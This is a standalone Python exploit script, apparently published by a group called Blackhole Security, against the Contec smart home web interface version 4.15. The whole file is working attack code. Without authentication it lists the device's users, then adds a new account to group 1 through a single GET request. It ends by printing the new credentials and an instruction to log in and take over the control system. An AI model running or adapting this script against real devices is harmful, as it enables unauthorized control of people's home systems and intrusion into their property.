contexploit.py

#!/usr/bin/env python

"""
Copyright (c) 2018 Blackhole Security. all right reserved.

"""

import time, argparse, sys
try:
    import requests
except ImportError:
    print('\nPlease install requests module')
    sys.exit()

try:
    from bs4 import BeautifulSoup
except ImportError:
    print('\nPlease install bs4 module')
    sys.exit()

class colour():
    green = '\033[92m'
    red = '\033[91m'
    white = '\033[0m'

def usage_msg(name=None):
    return '''python contexploit.py -t http://<ip>:<port> --list-user'''

opts = argparse.ArgumentParser(description="Contec smart home Unauthorized Users Added. (Affected version : 4.15)", usage=usage_msg())
opts.add_argument('-v', '--version', action="version", version="v1.0",
                   help="Show version and exit")
opts.add_argument('-t', '--target', dest="target", action="store", default=False,
                   help="Target address (e.g. http://<ip>:<port>)", required=True)
opts.add_argument('-l', '--list-user', dest="list", action="store_true",
                   help="Grap all user list on the web server")
opts.add_argument('-u', '--new-user', dest="user", action="store", default=False,
                   help="New username")
opts.add_argument('-p', '--new-password', dest="password", action="store", default=False,
                   help="New password")
args = opts.parse_args()

if __name__ == '__main__':
    url = args.target
    sub_link1 = args.user
    sub_link2 = args.password
    header = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36'}
    if args.target and args.list:
        print(colour.green + "[*]" + colour.white + " Trying to get the user list...")
        time.sleep(2)
        try:
            req = requests.get(url + '/content/user.php', headers=header, timeout=10)
            req.raise_for_status()
            soup = BeautifulSoup(req.content, "html.parser")
            for script in soup(["script", "style"]):
                script.decompose()

            text = soup.get_text()
            lines = (line.strip() for line in text.splitlines())
            chunks = (phrase.strip() for line in lines for phrase in line.split(" "))
            text = '\n'.join(chunk for chunk in chunks if chunk)
            clear_text = text.encode(sys.stdout.encoding)
            print("""{0}\n[*]{1} Available users : \n{2}""".format(colour.green, colour.white, clear_text))
            sys.exit()

        except requests.exceptions.HTTPError as error_1:
            print("""{0}\n[x]{1} Http Error : {2}""".format(colour.red, colour.white, error_1))
            sys.exit()
        except requests.exceptions.ConnectionError as error_2:
            print("""{0}\n[x]{1} Error Connecting : {2}""".format(colour.red, colour.white, error_2))
            sys.exit()
        except requests.exceptions.Timeout as error_3:
            print("""{0}\n[x]{1} Timeout Error : {2}""".format(colour.red, colour.white, error_3))
            sys.exit()
        except requests.exceptions.RequestException as error_4:
            print("""{0}\n[x]{1} Another Error : {2}""".format(colour.red, colour.white, error_4))
            sys.exit()
        except(KeyboardInterrupt):
            print(colour.red + "\n[x]" + colour.white + " CTRL+C Detected, force program to stop")
            sys.exit()

    if args.target and args.user and args.password:
        try:
            print(colour.green + '[*] ' + colour.white + 'Attempt to adding new users...')
            time.sleep(2)
            r = requests.get(url + """/content/new_user.php?user_name="""+sub_link1+"""&password="""+sub_link2+"""&group_id=1""", headers=header, timeout=10)
            r.status_code
            if r.ok:
                print(colour.green + """\n[*] """ + colour.white + """Successfully added new users""")
                print("""\n    username   : """ +args.user+ """ """)
                print("""    password   : """ +args.password+ """ """)
                print("""    login page : """ +args.target+ """/content/smarthome.php """)
                print("""\n    open that URL and login with those credentials to take over the control system""")
                sys.exit()

            else:
                print(colour.red + '\n[x] ' + colour.white + 'Failed to add new users, make sure your target is correct.')
                sys.exit()

        except(KeyboardInterrupt):
            print(colour.red + "\n[x]" + colour.white + " CTRL+C Detected, force program to stop")
            sys.exit()

    else:
        print('\nError : some arguments is missing')
        sys.exit()